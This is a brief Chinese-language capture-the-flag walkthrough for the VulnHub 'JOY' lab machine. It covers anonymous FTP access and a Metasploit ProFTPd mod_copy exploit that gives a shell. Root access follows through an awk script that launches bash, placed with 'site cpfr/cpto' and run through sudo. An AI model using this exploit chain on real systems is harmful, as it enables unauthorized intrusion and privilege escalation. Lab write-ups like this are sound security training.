JOY靶机

仅供个人娱乐

靶机信息

下载地址：https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

一、主机扫描

二、信息收集和漏洞利用

 

 

FTP服务允许匿名用户(anonymous)登录

或者

由于version_control存在于patrick路径中，我们是没有权限去获取的，所以尝试将其转移到/upload路径中

敏感信息

ProFTPd: 1.3.5

/var/www/tryingharderisjoy

故障 更改ip

use exploit/unix/ftp/proftpd_modcopy_exec

set rhosts 192.168.74.130

set sitepath /var/www/tryingharderisjoy

run

python -c 'import pty; pty.spawn("/bin/bash")'

信息收集

su -l patrick     apollo098765

提权

本地主机编写脚本

echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test

使用ftp上传到upload            anonymous

在使用telnet转换一下路径

site cpfr /home/ftp/upload/test

site cpto /home/patrick/script/test

使用脚本

sudo /home/patrick/script/test   

cd /root

cat proof.txt

搞定

参考文章https://blog.csdn.net/weixin_44214107/article/details/101228240